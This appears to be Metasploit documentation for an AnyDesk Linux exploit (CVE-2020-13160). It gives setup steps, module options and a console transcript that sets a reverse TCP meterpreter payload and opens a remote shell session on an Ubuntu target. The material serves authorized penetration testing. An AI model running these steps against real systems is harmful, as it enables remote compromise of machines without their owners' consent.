Files
metasploit-gs/documentation/modules/exploit/linux/misc/cve_2020_13160_anydesk.md
T

2.4 KiB

Vulnerable Application

This vulnerability affects Linux versions 5.5.2 and older. Old versions of AnyDesk can be downloaded from their site at https://download.anydesk.com/linux/. Use the .deb package for an Ubuntu installation.

The check method on this exploit will send an AnyDesk discovery frame to the target host, which will cause the target to respond with its own discovery frame. Each of these are sent from a random source port to the default AnyDesk discovery service port of 50001. To configure the listening service in Metasploit, change the SRVHOST and SRVPORT options. The exploit will use this method to detect the remote hostname and confirm that the operating system is Linux before proceeding.

Verification Steps

  1. Install the application
  2. Start the AnyDesk GUI. A window will open, leave it running.
  3. Start msfconsole
  4. Do: use exploit/linux/misc/cve_2020_13160_anydesk
  5. Set the module options
  6. Do: exploit
  7. You should get a shell.

Options

SRVHOST

This option is used to specify the host on which to listen for discovery frames from AnyDesk.

SRVPORT

This option is used to specify the port on which to listen for discovery frames from AnyDesk.

Scenarios

Ubuntu 18.04 x64

msf5 exploit(linux/misc/cve_2020_13160_anydesk) > use exploit/linux/misc/cve_2020_13160_anydesk 
msf5 exploit(linux/misc/cve_2020_13160_anydesk) > set RHOSTS 192.168.159.33
RHOSTS => 192.168.159.33
msf5 exploit(linux/misc/cve_2020_13160_anydesk) > set PAYLOAD linux/x64/meterpreter/reverse_tcp 
PAYLOAD => linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/misc/cve_2020_13160_anydesk) > check
[*] 192.168.159.33:50001 - The service is running, but could not be validated. Remote hostname: ubuntu
msf5 exploit(linux/misc/cve_2020_13160_anydesk) > exploit

[*] Started reverse TCP handler on 192.168.250.87:4444 
[*] Discovered the remote service (hostname: ubuntu, os: linux)
[*] Sent exploit frame, waiting for the GUI to refresh to trigger the vulnerability...
[*] Sending stage (3012516 bytes) to 192.168.250.237
[*] Meterpreter session 1 opened (192.168.250.87:4444 -> 192.168.250.237:51044) at 2020-06-17 10:21:44 -0400

meterpreter > getuid
Server username: no-user @ ubuntu (uid=1000, gid=1000, euid=1000, egid=1000)
meterpreter > sysinfo
Computer     : 192.168.159.33
OS           : Ubuntu 18.04 (Linux 5.3.0-59-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >